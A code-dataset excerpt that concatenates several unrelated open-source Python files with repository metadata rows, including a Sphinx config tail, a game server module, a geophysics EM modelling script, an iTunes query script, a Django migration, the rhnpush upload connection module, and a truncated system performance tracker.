# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output --------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'mplstereonet', u'mplstereonet Documentation',
[u'Joe Kington'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output ------------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'mplstereonet', u'mplstereonet Documentation',
u'Joe Kington', 'mplstereonet', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# -- Options for Epub output ---------------------------------------------------
# Bibliographic Dublin Core info.
epub_title = u'mplstereonet'
epub_author = u'Joe Kington'
epub_publisher = u'Joe Kington'
epub_copyright = u'2013, Joe Kington'
# The language of the text. It defaults to the language option
# or en if the language is not set.
#epub_language = ''
# The scheme of the identifier. Typical schemes are ISBN or URL.
#epub_scheme = ''
# The unique identifier of the text. This can be a ISBN number
# or the project homepage.
#epub_identifier = ''
# A unique identification for the text.
#epub_uid = ''
# A tuple containing the cover image and cover page html template filenames.
#epub_cover = ()
# HTML files that should be inserted before the pages created by sphinx.
# The format is a list of tuples containing the path and title.
#epub_pre_files = []
# HTML files shat should be inserted after the pages created by sphinx.
# The format is a list of tuples containing the path and title.
#epub_post_files = []
# A list of files that should not be packed into the epub file.
#epub_exclude_files = []
# The depth of the table of contents in toc.ncx.
#epub_tocdepth = 3
# Allow duplicate toc entries.
#epub_tocdup = True
# Show __init__ docs
def skip(app, what, name, obj, skip, options):
if name == '__init__':
return False
return skip
def setup(app):
app.connect('autodoc-skip-member', skip)
|
mit
| 6,082,613,948,636,367,000
| 30.452145
| 80
| 0.701889
| false
| 3.690937
| true
| false
| false
|
JonasT/miraclecrafter
|
src/miraclecrafterserver/onlinegame.py
|
1
|
5858
|
"""
This file is part of the Miracle Crafter Server.
Miracle Crafter Server (C) 2014 The Miracle Crafter Team (see AUTHORS)
Miracle Crafter Server is free software: you can redistribute it and/or
modify it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or (at your
option) any later version.
Miracle Crafter Server is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with Miracle Crafter Server.
If not, see <http://www.gnu.org/licenses/>.
In addition, the Miracle Crafter Server developers grant this exception:
Game code and content created with the Miracle Crafter Client as part
of your game shall be excepted from the GPL licensing of Miracle Crafter
Server. However, this exception doesn't cover any modifications to any of
the GPL-licensed files shipping with Miracle Crafter Server, or adding
new files to any of the folders containing GPL-licensed files of Miracle
Crafter Server, or game code attempting to modify Miracle Crafter Server's
behavior at runtime beyond using the regular game code interfaces for Lua
code which your game is supposed to use.
"""
import logging
from miraclecrafterserver.server import SimpleServer
from miraclecrafterserver.game import Game
from miraclecrafterserver.protocolmodule import get_module_instances, \
OnlineGameBaseModule
from miraclecrafterserver.accounts import login
class OnlineGame(Game):
def __init__(self, game_path, port, version_str):
super(OnlineGame, self).__init__(game_path)
self.connections = []
self.port = port
self.version_str = version_str
self.required_client_version = 1
module_instances = get_module_instances()
logging.info("Starting game with " + str(len(module_instances))\
+ " module instances available")
for module in module_instances.values():
if isinstance(module, OnlineGameBaseModule):
module.set_online_game_instance(self)
else:
module.set_game_instance(self)
def split_args(self, args_line):
if len(args_line) == 0:
return []
splitted_list = args_line.split(":", 1)
last_arg = ""
if len(splitted_list) == 2:
last_arg = splitted_list[1].strip()
splittable_args = splitted_list[0]
while splittable_args.find(" ") >= 0:
splittable_args = splittable_args.replace(" ", " ")
args = splittable_args.split(" ")
if len(args[0]) == 0:
del args[0]
if len(last_arg) > 0:
args.append(last_arg)
return args
def connection_has_data(self, connection, data):
data = data.strip()
if len(data) == 0:
return
module = data.split(" ", 1)[0]
data = data[len(module)+1:]
cmd = data.split(" ", 1)[0]
args = self.split_args(data[len(cmd)+1:])
if len(cmd) == 0:
connection.send("core error-empty-cmd")
return
if not module == "core":
module_instances = get_module_instances()
# forward to appropriate module:
if module in module_instances:
if not connection.connected_as_client:
if not isinstance(module_instances[module], \
OnlineGameBaseModule):
connection.send("core error-module-unavailable " +\
module)
return
self.process_cmd(connection, module, cmd, args)
return
self.process_cmd(connection.client, module, cmd, args)
return
# module not found:
connection.send("core error-invalid-module :" + module)
return
else:
if cmd == "quit":
connection.send("core confirm-quit :Bye!")
connection.close()
self.connections.remove(connection)
elif cmd == "ping":
if len(args) == 0:
connection.send("core error-missing-arguments core ping")
return
if len(args[0]) > 64:
connection.send("core error-invalid-argument core " +\
"ping 1 :excessive length")
return
connection.send("core pong :" + args[0])
else:
connection.send("core error-unknown-cmd core :" + cmd)
def server_reports_new_connection(self, connection):
connection.connected_as_client = False
connection.set_read_callback(lambda data:
self.connection_has_data(connection, data))
self.connections.append(connection)
connection.send("core hello-msg :Hello client! This is Miracle "\
"Crafter Server Version " + self.version_str)
connection.send("core version-info " + self.version_str + " :" + \
"unmodified")
connection.send("core available-server-protocol-extensions :" + \
"core")
connection.send("core required-client-protocol-extensions :" + \
"core")
connection.send("core required-client-version " +\
str(self.required_client_version))
def run(self):
self.server = SimpleServer(self.port, \
self.server_reports_new_connection)
frame_time = 1/10
while 1:
self.server.tick(frame_time)
|
gpl-3.0
| 9,010,634,835,741,574,000
| 38.581081
| 79
| 0.602253
| false
| 4.32644
| false
| false
| false
|
geoscixyz/em_examples
|
em_examples/FDEMpipe.py
|
1
|
6739
|
import numpy as np
import matplotlib.pyplot as plt
import scipy.io
import warnings
warnings.filterwarnings('ignore')
from ipywidgets import interactive, IntSlider, widget, FloatText, FloatSlider, Checkbox
def fempipeWidget(alpha, pipedepth):
respEW, respNS, X, Y = fempipe(alpha, pipedepth)
fig = plt.figure(figsize = (12, 9))
ax0 = plt.subplot2grid((2,2), (0,0))
ax1 = plt.subplot2grid((2,2), (0,1))
ax2 = plt.subplot2grid((2,2), (1,0), colspan=2)
dat0 = ax0.imshow(respEW.real*100, extent=[X.min(),X.max(),Y.min(),Y.max()])
dat1 = ax1.imshow(respNS.real*100, extent=[X.min(),X.max(),Y.min(),Y.max()])
cb0 = plt.colorbar(dat0, ax = ax0)
cb1 = plt.colorbar(dat1, ax = ax1)
ax0.set_title("In-phase EW boom (%)", fontsize = 12)
ax1.set_title("In-phase NS boom (%)", fontsize = 12)
ax0.set_xlabel("Easting (m)", fontsize = 12)
ax1.set_xlabel("Easting (m)", fontsize = 12)
ax0.set_ylabel("Northing (m)", fontsize = 12)
ax1.set_ylabel("Northing (m)", fontsize = 12)
ax0.plot(np.r_[0., 0.], np.r_[-10., 10.], 'k--', lw=2)
ax1.plot(np.r_[0., 0.], np.r_[-10., 10.], 'k--', lw=2)
ax2.plot(Y[:,20],respEW[:, 20].real, 'k.-')
ax2.plot(Y[:,20],respEW[:, 20].imag, 'k--')
ax2.plot(Y[:,20],respNS[:, 20].real, 'r.-')
ax2.plot(Y[:,20],respNS[:, 20].imag, 'r--')
ax2.legend(('In-phase EW boom', 'Out-of-phase EW boom', 'In-phase NS boom', 'Out-of-phase NS boom'),loc=4)
ax2.grid(True)
ax2.set_ylabel('Hs/Hp (%)', fontsize = 16)
ax2.set_xlabel('Northing (m)', fontsize = 16)
ax2.set_title('Northing profile line at Easting 0 m', fontsize = 16)
plt.tight_layout()
plt.show()
def fempipe(a, pipedepth):
"""
EOSC350 forward modeling of EM-31 responses with pipeline model
Only two adjustable parameters: alpha and depth of pipe below surface
Pipeline oriented W-E (many small loops lined up)
forward model EW ans NS boom configurations
Plot in-phase maps of EW and NS boom
Plot NS profile
"""
freq = 9800
L = 0.1
s = 3.6
R = 2*np.pi*freq*L/a
fa = (1j*a)/(1+1j*a)
tau = L/R
boomheight = 1.
Npipe = 20
xmax = 10.
npts = 100
pipeloc = np.c_[ np.linspace(-10,10,Npipe), np.zeros(Npipe), np.zeros(Npipe)-pipedepth]
pipeloc = np.vstack((pipeloc, pipeloc))
pipeangle1 = np.c_[np.zeros(Npipe)+90, np.zeros(Npipe)+0]
pipeangle2 = np.c_[np.zeros(Npipe)+90, np.zeros(Npipe)+90] #.. what's this?
pipeangle3 = np.c_[np.zeros(Npipe)+0, np.zeros(Npipe)+0]
pipeangle = np.vstack((pipeangle1, pipeangle3))
x = np.linspace(-xmax, xmax, num=npts)
y = x.copy()
X, Y = np.meshgrid(x, y)
XY = np.c_[X.flatten(), Y.flatten()]
loop1loc_NS = np.c_[XY[:,0], XY[:,1]-s/2, boomheight*np.ones(XY.shape[0])]
loop3loc_NS = np.c_[XY[:,0], XY[:,1]+s/2, boomheight*np.ones(XY.shape[0])]
loop1angle = np.c_[np.ones(XY.shape[0])*0., np.ones(XY.shape[0])*0.]
loop3angle = np.c_[np.ones(XY.shape[0])*0., np.ones(XY.shape[0])*0.]
loop1loc_EW = np.c_[XY[:,0]-s/2, XY[:,1], boomheight*np.ones(XY.shape[0])]
loop3loc_EW = np.c_[XY[:,0]+s/2, XY[:,1], boomheight*np.ones(XY.shape[0])]
respEW = 0j
respNS = 0j
for q in range(pipeloc.shape[0]):
loop2loc = np.c_[np.ones(XY.shape[0])*pipeloc[q,0], np.ones(XY.shape[0])*pipeloc[q,1], np.ones(XY.shape[0])*pipeloc[q,2]]
loop2angle = np.c_[np.ones(XY.shape[0])*pipeangle[q,0], np.ones(XY.shape[0])*pipeangle[q,1]]
respEW += HsHp(loop1loc_EW,loop1angle,loop2loc,loop2angle,loop3loc_EW,loop3angle,freq,L,R)
respNS += HsHp(loop1loc_NS,loop1angle,loop2loc,loop2angle,loop3loc_NS,loop3angle,freq,L,R)
return respEW.reshape((npts, npts)), respNS.reshape((npts, npts)), X, Y
def Lij(loopiloc,loopiangle,loopjloc,loopjangle):
"""
Calculate mnutual inductance of two loops (simplified to magnetic dipole)
SEG EM Volume II (Page 14): ... Lij as the amount of magnetic flux that
cuts circuit i due to a unit current in loop j.
Since we use magnetic dipole model here, the magnetic flux will be the
magnetic intensity B obtained by Biot-Savart Law.
Angles in degree
Inductance in T*m^2/A; Here the current and loop area are both unit.
"""
xi = loopiloc[:,0]
yi = loopiloc[:,1]
zi = loopiloc[:,2]
xj = loopjloc[:,0]
yj = loopjloc[:,1]
zj = loopjloc[:,2]
thetai = loopiangle[:,0]
alphai = loopiangle[:,1]
thetaj = loopjangle[:,0]
alphaj = loopjangle[:,1]
thetai = thetai/180 * np.pi # degtorad(thetai);
alphai = alphai/180 * np.pi # degtorad(alphai);
thetaj = thetaj/180 * np.pi # degtorad(thetaj);
alphaj = alphaj/180 * np.pi # degtorad(alphaj);
# http://en.wikipedia.org/wiki/Magnetic_moment#Magnetic_flux_density_due_to_an_arbitrary_oriented_dipole_moment_at_the_origin
# assume the dipole at origin, the observation is now at
x = xi - xj
y = yi - yj
z = zi - zj
# orthogonal decomposition of dipole moment
p = np.cos(thetaj); # vertical
n = np.sin(thetaj) * np.cos(alphaj) # y
m = np.sin(thetaj) * np.sin(alphaj) # x
Hx = ( 3.*(m*x+n*y+p*z)*x/((x**2+y**2+z**2)**(5./2)) - m/((x**2+y**2+z**2)**(3./2)) )/4./np.pi
Hy = ( 3.*(m*x+n*y+p*z)*y/((x**2+y**2+z**2)**(5./2)) - n/((x**2+y**2+z**2)**(3./2)) )/4./np.pi
Hz = ( 3.*(m*x+n*y+p*z)*z/((x**2+y**2+z**2)**(5./2)) - p/((x**2+y**2+z**2)**(3./2)) )/4./np.pi
H = np.c_[Hx, Hy, Hz]
# project B field to normal direction of loop i
L = H*np.c_[ np.sin(thetai)*np.sin(alphai), np.sin(thetai)*np.cos(alphai), np.cos(thetai)]
return L.sum(axis=1)
def HsHp(loop1loc,loop1angle,loop2loc,loop2angle,loop3loc,loop3angle, freq,L,R):
"""
EM response of 3-loop model
response = Hs/Hp = - (L12*L23/L22/L13) * (i*a/(1+i*a))
"""
a = 2. * np.pi * freq * L / R
L12 = L * Lij(loop1loc,loop1angle,loop2loc,loop2angle)
L23 = L * Lij(loop2loc,loop2angle,loop3loc,loop3angle)
L13 = Lij(loop1loc,loop1angle,loop3loc,loop3angle)
response = - (L12*L23/L13/L) * ( (1j*a)/(1+1j*a) )
return response
def interact_femPipe():
Q = interactive(fempipeWidget,
alpha = FloatSlider(min=0.1,max=5.,step=0.1,value=1., continuous_update=False),
pipedepth = FloatSlider(min=0.5,max=4.0,step=0.1,value=1.0, continuous_update=False))
return Q
if __name__ == '__main__':
a = 1.
pipedepth = 1.
respEW, respNS, X, Y = fempipe(a, pipedepth)
# print resp.shape
import matplotlib.pyplot as plt
fig, ax = plt.subplots(1,2, figsize = (12, 5))
ax[0].pcolor(X, Y, respEW.real, 40)
ax[1].pcolor(X, Y, respNS.real, 40)
plt.show()
|
mit
| -2,975,767,107,371,324,000
| 36.859551
| 129
| 0.601425
| false
| 2.54494
| false
| false
| false
|
myles/mylesbraithwaite.org
|
source/_uploads/2016/05/20/itunes-playing/playing.py
|
1
|
1806
|
#!/usr/bin/env python3
import subprocess
def osascript(script):
"""
This is a bridge between Python and AppleScript using the `osascript`
comamnd line app.
"""
process = subprocess.run(['osascript', '-e', script],
stdout=subprocess.PIPE)
# Because the `subprocess.CompletedProcess` class returns a byte (followed
# by a new line), I have to clean it a little.
return process.stdout.decode('utf-8').strip()
def itunes(args):
"""This is so I don't have to repeat a bunch of code."""
script = 'tell application "iTunes" to {0} as string'
return osascript(script.format(args))
def is_running():
"""
Here we a checking to see if iTunes is currently running.
I'm doing this because if iTunes is closed I don't want to open it.
"""
output = osascript('application "iTunes" is running')
if output == 'true':
return True
else:
return False
def is_playing():
"""This function is to check if iTunes is currently playing music."""
output = itunes('player state')
if output == 'playing':
return True
else:
return False
def get_track():
"""This is the main function that get the currently playing track."""
track = {}
track['name'] = itunes('name of current track')
track['artist'] = itunes('artist of current track')
track['album'] = itunes('album of current track')
return track
def main():
if not is_running():
return None
# `is_running()` and `is_playing()` need to be run separately, if together
# than it will launch iTunes.
if is_playing():
print('iTunes is currently playing:')
print("{name} / {artist} / {album}".format(**get_track()))
if __name__ == "__main__":
main()
|
cc0-1.0
| -5,790,147,332,706,279,000
| 23.405405
| 78
| 0.616279
| false
| 3.892241
| false
| false
| false
|
jeffmacinnes/pyneal
|
utils/mkDummyMask.py
|
1
|
2226
|
"""
Tool to quickly make a dummy mask with user-supplied dimensions
The resulting mask will be a rectangle (.25*xDim X .25*yDim) positioned in the
middle of the middle slice of the given volume dimensions
"""
import os
from os.path import join
import sys
import argparse
import nibabel as nib
import numpy as np
def mkDummyMask(dims, outputDir):
""" Make a dummy mask of given dims
Parameters
----------
dims : int list (length = 3)
[x, y, z] dimensions of the output mask
outputDir : string
full path to where the output mask will be saved
"""
assert len(dims) == 3, 'Too many dimensions specified!'
# volume dims
x,y,z = dims
print('mask dimensions: [{}, {}, {}]'.format(x,y,z))
# confirm output path is a real path
if not os.path.exists(outputDir):
print('Output path does not exist: {}'.format(outputDir))
sys.exit()
# make array of zeros
maskArray = np.zeros(shape=[x,y,z])
# make a square in the middle slice of 1s. this will be the mask
mask_sizeX = np.floor(x/4)
mask_sizeY = np.floor(y/4)
maskStartX = int(np.floor(x/2) - mask_sizeX/2)
maskEndX = int(maskStartX + mask_sizeX)
maskStartY = int(np.floor(y/2) - mask_sizeY/2)
maskEndY = int(maskStartY + mask_sizeY)
maskArray[maskStartX:maskEndX, maskStartY:maskEndY, int(np.floor(z/2))] = 1
# save as nib object
maskImage = nib.Nifti1Image(maskArray, affine=np.eye(4))
outputName = 'dummyMask_{}-{}-{}.nii.gz'.format(x,y,z)
outputPath = join(outputDir, outputName)
nib.save(maskImage, outputPath)
print('dummy mask saved as: {}'.format(outputPath))
if __name__ == '__main__':
# parse arguments
parser = argparse.ArgumentParser()
parser.add_argument('maskDims',
metavar='dim',
type=int,
nargs=3,
help='volume dims: x y z')
parser.add_argument('-o', '--outputDir',
default='.',
type=str,
help='output dir path for saving mask')
args = parser.parse_args()
print(args)
mkDummyMask(args.maskDims, args.outputDir)
|
mit
| -8,057,642,820,469,725,000
| 28.289474
| 79
| 0.602426
| false
| 3.544586
| false
| false
| false
|
GreatLakesEnergy/sesh-dash-beta
|
seshdash/migrations/0006_auto_20170117_1613.py
|
1
|
2776
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9.1 on 2017-01-17 14:13
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('seshdash', '0005_remove_report_sent_report_date'),
]
operations = [
migrations.CreateModel(
name='Sensor_Node',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('node_id', models.IntegerField(choices=[(19, 19), (20, 20), (21, 21), (22, 22), (23, 23), (24, 24), (25, 25), (26, 26), (27, 27), (28, 28), (29, 29)], default=0)),
('sensor_type', models.CharField(choices=[(b'Temperature Humidity', b'th'), (b'Power Voltage', b'tx'), (b'Ph Ethenoal', b'pe')], max_length=40)),
('index1', models.CharField(default=b'ac_power1', max_length=40)),
('index2', models.CharField(default=b'pv_production', max_length=40)),
('index3', models.CharField(default=b'consumption', max_length=40)),
('index4', models.CharField(default=b'grid_in', max_length=40)),
('index5', models.CharField(default=b'AC_Voltage_out', max_length=40)),
('index6', models.CharField(blank=True, max_length=40, null=True)),
('index7', models.CharField(blank=True, max_length=40, null=True)),
('index8', models.CharField(blank=True, max_length=40, null=True)),
('index9', models.CharField(blank=True, max_length=40, null=True)),
('index10', models.CharField(blank=True, max_length=40, null=True)),
('index11', models.CharField(blank=True, max_length=40, null=True)),
('index12', models.CharField(blank=True, max_length=40, null=True)),
('site', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='seshdash.Sesh_Site')),
],
),
migrations.RemoveField(
model_name='sensor_bmv',
name='site',
),
migrations.RemoveField(
model_name='sensor_emonpi',
name='site',
),
migrations.RemoveField(
model_name='sensor_emonth',
name='site',
),
migrations.RemoveField(
model_name='sensor_emontx',
name='site',
),
migrations.DeleteModel(
name='Sensor_BMV',
),
migrations.DeleteModel(
name='Sensor_EmonPi',
),
migrations.DeleteModel(
name='Sensor_EmonTh',
),
migrations.DeleteModel(
name='Sensor_EmonTx',
),
]
|
mit
| -3,634,531,187,939,472,000
| 41.707692
| 180
| 0.552954
| false
| 3.751351
| false
| false
| false
|
renner/spacewalk
|
client/tools/rhnpush/connection.py
|
1
|
10533
|
#
# Copyright (c) 2008--2017 Red Hat, Inc.
#
# This software is licensed to you under the GNU General Public License,
# version 2 (GPLv2). There is NO WARRANTY for this software, express or
# implied, including the implied warranties of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. You should have received a copy of GPLv2
# along with this software; if not, see
# http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt.
#
# Red Hat trademarks are not licensed under GPLv2. No permission is
# granted to use or replicate Red Hat trademarks that are incorporated
# in this software or its documentation.
#
import socket
import base64
import sys
# pylint: disable=F0401,E0611,W0632
from rhn import connections, rpclib
from spacewalk.common.usix import ListType, TupleType, IntType
from spacewalk.common.rhn_pkg import InvalidPackageError, package_from_filename
from spacewalk.common.usix import raise_with_tb
from rhnpush.utils import tupleify_urlparse
if sys.version_info[0] == 3:
from urllib.parse import splitport
from urllib.parse import urlparse
else:
from urlparse import urlparse
from urllib import splitport # pylint: disable=C0412
# pylint: disable=W0622
class ConnectionError(Exception):
pass
# pylint: disable=R0902
class BaseConnection:
def __init__(self, uri, proxy=None):
self._scheme, (self._host, self._port), self._path = parse_url(uri)[:3]
if proxy:
arr = rpclib.get_proxy_info(proxy)
self._proxy_host = arr[0]
self._proxy_port = arr[1]
self._proxy_username = arr[2]
self._proxy_password = arr[3]
else:
self._proxy_host = None
self._trusted_certs = None
self._connection = None
self._timeout = None
def set_timeout(self, timeout):
self._timeout = timeout
def get_connection(self):
if self._scheme not in ['http', 'https']:
raise ValueError("Unsupported scheme", self._scheme)
params = {}
if self._timeout is not None:
params['timeout'] = self._timeout
if self._proxy_host:
params.update({
'host': self._host,
'port': self._port,
'proxy': "%s:%s" % (self._proxy_host, self._proxy_port),
'username': self._proxy_username,
'password': self._proxy_password,
})
if self._scheme == 'http':
return connections.HTTPProxyConnection(**params)
params['trusted_certs'] = self._trusted_certs
return connections.HTTPSProxyConnection(**params)
else:
if self._scheme == 'http':
return connections.HTTPConnection(self._host, self._port, **params)
params['trusted_certs'] = self._trusted_certs
return connections.HTTPSConnection(self._host, self._port, **params)
def connect(self):
self._connection = self.get_connection()
self._connection.connect()
def putrequest(self, method, url=None, skip_host=0):
if url is None:
url = self._path
return self._connection.putrequest(method, url=url,
skip_host=skip_host)
def __getattr__(self, name):
return getattr(self._connection, name)
class PackageUpload:
header_prefix = "X-RHN-Upload"
user_agent = "rhn-package-upload"
def __init__(self, url, proxy=None):
self.connection = BaseConnection(url, proxy)
self.headers = {}
self.package_name = None
self.package_epoch = None
self.package_version = None
self.package_release = None
self.package_arch = None
self.checksum = None
self.checksum_type = None
self.nvra = None
self._resp_headers = None
self.packaging = None
self._response = None
def set_header(self, name, value):
if name not in self.headers:
vlist = self.headers[name] = []
else:
vlist = self.headers[name]
if not isinstance(vlist, (ListType, TupleType)):
vlist = [vlist]
vlist.append(value)
def send_http_headers(self, method, content_length=None):
try:
self.connection.connect()
except socket.error:
e = sys.exc_info()[1]
raise_with_tb(ConnectionError("Error connecting", str(e)), sys.exc_info()[2])
# Add content_length
if 'Content-Length' not in self.headers and \
content_length is not None:
self.set_header('Content-Length', content_length)
self.connection.putrequest(method)
# Additional headers
for hname, hval in self.headers.items():
if not isinstance(hval, (ListType, TupleType)):
hval = [hval]
for v in hval:
self.connection.putheader(str(hname), str(v))
self.connection.endheaders()
def send_http_body(self, stream_body):
if stream_body is None:
return
stream_body.seek(0, 0)
buffer_size = 16384
while 1:
buf = stream_body.read(buffer_size)
if not buf:
break
try:
self.connection.send(buf)
except IOError:
e = sys.exc_info()[1]
raise_with_tb(ConnectionError("Error sending body", str(e)), sys.exc_info()[2])
def send_http(self, method, stream_body=None):
if stream_body is None:
content_length = 0
else:
stream_body.seek(0, 2)
content_length = stream_body.tell()
self.send_http_headers(method, content_length=content_length)
self.send_http_body(stream_body)
self._response = self.connection.getresponse()
self._resp_headers = self._response.msg
return self._response
def upload(self, filename, fileChecksumType, fileChecksum):
"""
Uploads a file.
Returns (http_error_code, error_message)
Sets:
self.package_name
self.package_epoch
self.package_version
self.package_release
self.package_arch
"""
try:
a_pkg = package_from_filename(filename)
a_pkg.read_header()
except InvalidPackageError:
return -1, "Not an RPM: %s" % filename
# Set some package data members
self.package_name = a_pkg.header['name']
self.package_epoch = a_pkg.header['epoch']
self.package_version = a_pkg.header['version']
self.package_release = a_pkg.header['release']
if a_pkg.header.is_source:
if 1051 in a_pkg.header.keys():
self.package_arch = 'nosrc'
else:
self.package_arch = 'src'
else:
self.package_arch = a_pkg.header['arch']
self.packaging = a_pkg.header.packaging
nvra = [self.package_name, self.package_version, self.package_release,
self.package_arch]
if isinstance(nvra[3], IntType):
# Old rpm format
return -1, "Deprecated RPM format: %s" % filename
self.nvra = nvra
# use the precomputed passed checksum
self.checksum_type = fileChecksumType
self.checksum = fileChecksum
# Set headers
self.set_header("Content-Type", "application/x-rpm")
self.set_header("User-Agent", self.user_agent)
# Custom RHN headers
prefix = self.header_prefix
self.set_header("%s-%s" % (prefix, "Package-Name"), nvra[0])
self.set_header("%s-%s" % (prefix, "Package-Version"), nvra[1])
self.set_header("%s-%s" % (prefix, "Package-Release"), nvra[2])
self.set_header("%s-%s" % (prefix, "Package-Arch"), nvra[3])
self.set_header("%s-%s" % (prefix, "Packaging"), self.packaging)
if self.checksum_type == 'md5':
self.set_header("%s-%s" % (prefix, "File-MD5sum"), self.checksum)
else:
self.set_header("%s-%s" % (prefix, "File-Checksum-Type"), self.checksum_type)
self.set_header("%s-%s" % (prefix, "File-Checksum"), self.checksum)
a_pkg.input_stream.seek(0, 0)
self._response = self.send_http('POST', stream_body=a_pkg.input_stream)
a_pkg.input_stream.close()
retval = self.process_response()
self.connection.close()
return retval
def process_response(self):
status = self._response.status
reason = self._response.reason
if status == 200:
# OK
return status, "OK"
if status == 201:
# Created
return (status, "%s %s: %s-%s-%s.%s.rpm already uploaded" % (
self.checksum_type, self.checksum,
self.nvra[0], self.nvra[1], self.nvra[2], self.nvra[3]))
if status in (404, 409):
# Conflict
errstring = self.get_error_message(self._resp_headers)
return status, errstring
data = self._response.read()
if status == 403:
# In this case Authentication is no longer valid on server
# client needs to re-authenticate itself.
errstring = self.get_error_message(self._resp_headers)
return status, errstring
if status == 500:
print("Internal server error", status, reason)
errstring = self.get_error_message(self._resp_headers)
return status, data + errstring
return status, data
def get_error_message(self, headers):
prefix = self.header_prefix + '-Error'
text = [x[1] for x in headers.getaddrlist(prefix + '-String')]
# text is a list now, convert it to a string
text = '\n'.join(text)
# pylint: disable=W1505
text = base64.decodestring(text)
return text
def parse_url(url, scheme="http", path='/'):
_scheme, netloc, _path, params, query, fragment = tupleify_urlparse(
urlparse(url))
if not netloc:
# No scheme - trying to patch it up ourselves?
url = scheme + "://" + url
_scheme, netloc, _path, params, query, fragment = tupleify_urlparse(
urlparse(url))
if not netloc:
# XXX
raise Exception()
(host, port) = splitport(netloc)
if not _path:
_path = path
return (_scheme, (host, port), _path, params, query, fragment)
|
gpl-2.0
| 2,458,659,510,662,937,600
| 33.762376
| 95
| 0.58236
| false
| 3.949381
| false
| false
| false
|
dmytro-ignatenko/kuzenko
|
python-client/client.py
|
1
|
2905
|
import httplib2
import json
import urllib
from optparse import OptionParser
#from AptUrl.Parser import parse
h = httplib2.Http()
host = 'http://localhost:8080/kuzenko-ws/api/'
def setHost(hostName) :
global host
host = hostName
def setDatabaseName(name) :
resp, content = h.request(host + 'database/' + name, "POST", '')
#print resp
print content
def listTables() :
resp, content = h.request(host + "table", "GET")
#print resp
print content
def makeTable(data):
name,rest = data[0], ','.join(data[1:])
resp, content = h.request(host + "table/" + name + '?' + urllib.urlencode({"columnTypes" : rest}), "POST", '')
#print resp
print content
def removeTable(name) :
resp, content = h.request(host + "table/" + name , "DELETE", '')
#print resp
print content
def addRow(data) :
name,rest = data[0], ','.join(data[1:])
resp, content = h.request(host + "table/" + name + '/data' + '?' + urllib.urlencode({"columnData" : rest}) , "POST", '')
#print resp
print content
def removeRow(data) :
name, data = data[0], ','.join(data[1:])
resp, content = h.request(host + "table/" + name + '/data' + '?' + urllib.urlencode({"columnData" : {'1':'3'}}), "DELETE", '')
#print resp
print content
def dropDatabase() :
resp, content = h.request(host + "/database", "DELETE", '')
#print resp
print content
def showTable(name) :
resp, content = h.request(host + "table/" + name + '/data', "GET")
#print resp
print content
def descartTables(data) :
name1,name2 = data[0],data[1]
resp, content = h.request(host + "table/" + name1 + '/descart/' + name2, "GET")
#print resp
print content
methods = {
"lstbl" : listTables,
"mktbl" : makeTable,
"rmtbl" : removeTable,
"addrw" : addRow,
"rmvrw" : removeRow,
"drpdb" : dropDatabase,
"swtbl" : showTable,
"dctbl" : descartTables,
}
parser = OptionParser()
parser.add_option('-d',"--directory", action="store", type="string", dest="directory")
parser.add_option('-c','--command',action='store',type='string',dest='command')
parser.add_option('-p','--parameters',action='store',type='string',dest='parameters')
print "Python client started..."
line = raw_input()
while line != 'exit' :
(option,_) = parser.parse_args(line.split(' '))
if option.directory is None or option.command is None :
print "Wrong command format"
line = raw_input()
continue
setDatabaseName(option.directory)
method = methods[option.command]
if option.parameters is None : method()
else :
l = option.parameters.split(';')
if len(l) == 1 :
method(l[0].split('=')[1])
else :
method([x.split('=')[1] for x in l])
line = raw_input()
|
mit
| 8,205,013,659,229,442,000
| 28.948454
| 132
| 0.582788
| false
| 3.466587
| false
| false
| false
|
rosspalmer/PerformanceTrack
|
tracker.py
|
1
|
3755
|
import csv
import datetime
import pickle
import psutil
import os
import sys
# Locations for storage and export files
DATA_STORE_FILE = 'data.pik' # Add folder path for data pickle
SYSTEM_DATA_EXTRACT_FILE = 'system_log.csv' # Add folder path for system data CSV extract
PROCESS_DATA_EXTRACT_FILE = 'process_log.csv' # Add folder path for process data CSV extract
# Process specific stats name filter
PROCESS_FILTER = ['java', 'python']
# Time for CPU Usage calculations (in seconds)
CPU_CALC_TIME = 1.0
# Log performance for system and process level metrics and store
def log_current_state(os_type):
time = datetime.datetime.now()
new_system_data = system_performance_metrics(time)
new_processes_data = process_performance_metrics(time, os_type)
store(new_system_data, new_processes_data)
# Analyze performance of system level metrics
def system_performance_metrics(time):
# Setup entry dictionary and log time
entry = {}
entry['datetime'] = time
# Log CPU statistics
entry['cpu_usage'] = psutil.cpu_percent(CPU_CALC_TIME)
# Log memory statistics
mem = psutil.virtual_memory()
entry['mem_total'] = mem.total
entry['mem_available'] = mem.available
entry['mem_used'] = mem.used
entry['mem_percent_used'] = entry['mem_used'] / entry['mem_total']
return entry
# Analyze performance of filtered processes
def process_performance_metrics(time, os_type):
filtered_processes = []
memory_label = None
if os_type == 'windows':
memory_label = 'memory_info'
elif os_type == 'linux':
memory_label = 'memory_full_info'
# Loop through process data
